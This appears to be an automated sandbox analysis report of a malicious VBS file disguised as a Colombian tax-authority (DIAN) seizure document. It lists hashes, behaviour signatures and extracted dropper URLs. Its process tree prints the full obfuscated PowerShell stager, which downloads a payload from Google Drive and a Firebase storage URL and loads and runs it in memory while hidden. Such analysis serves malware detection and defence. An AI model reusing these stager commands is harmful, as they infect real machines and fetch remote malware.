Resubmissions

30/10/2024, 14:31

241030-rvq7zawaln 10

30/10/2024, 14:23

241030-rp9r5avhnl 10

Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    30/10/2024, 14:23

General

  • Target

    DOCUMENTO_SISTEMA_REQUERIMIENTO_DIAN_PROCESO_DE_EMBARGO_REVISION_INMEDIATA_ad8098904901470147f818615.vbs

  • Size

    68KB

  • MD5

    722ef0f62d5f0d96f0f63888e0d8ae39

  • SHA1

    0afc5ebc973e07bc01682922e5972dbfead09691

  • SHA256

    b2bea3384dc24126675379eb1473946f2927a10d8eff6730bc024716ef0f6864

  • SHA512

    9e614dbf3ea73992903a5a93884733ce4346e9108a78fba4f0ded8200cfd0fc33a929cebf2a1236163e63e6e33ac0b0daf8af8e881bb125f9cd57986db5454b2

  • SSDEEP

    1536:bUJW4Wrle/PhG+/kery+bGNccc3gt5pzaUGwm:jS7rgt5pnGwm

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENTO_SISTEMA_REQUERIMIENTO_DIAN_PROCESO_DE_EMBARGO_REVISION_INMEDIATA_ad8098904901470147f818615.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2296
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    fd65793e164e29b975803b200ed1a123

    SHA1

    9caa0f4b2a0e1ef4a358c9772b0565d5d272c48c

    SHA256

    d101c3209a80f4a4ea3d603fc038531dd2e09bd2d76cb606b4603b3fd6b2d923

    SHA512

    ac6538ad20ea3b05f44a044fed110cbf10b3b835d71108738e8434fb6264ede6f2778937a8100d6f785653068ecf9ab741f20bb0a9cd4e0ecc337ab86adc0cbc

  • memory/2296-4-0x000007FEF63BE000-0x000007FEF63BF000-memory.dmp

    Filesize

    4KB

  • memory/2296-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/2296-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

    Filesize

    32KB

  • memory/2296-8-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-13-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-14-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-15-0x000007FEF63BE000-0x000007FEF63BF000-memory.dmp

    Filesize

    4KB

  • memory/2296-19-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2960-18-0x000000001ACF0000-0x000000001AE4A000-memory.dmp

    Filesize

    1.4MB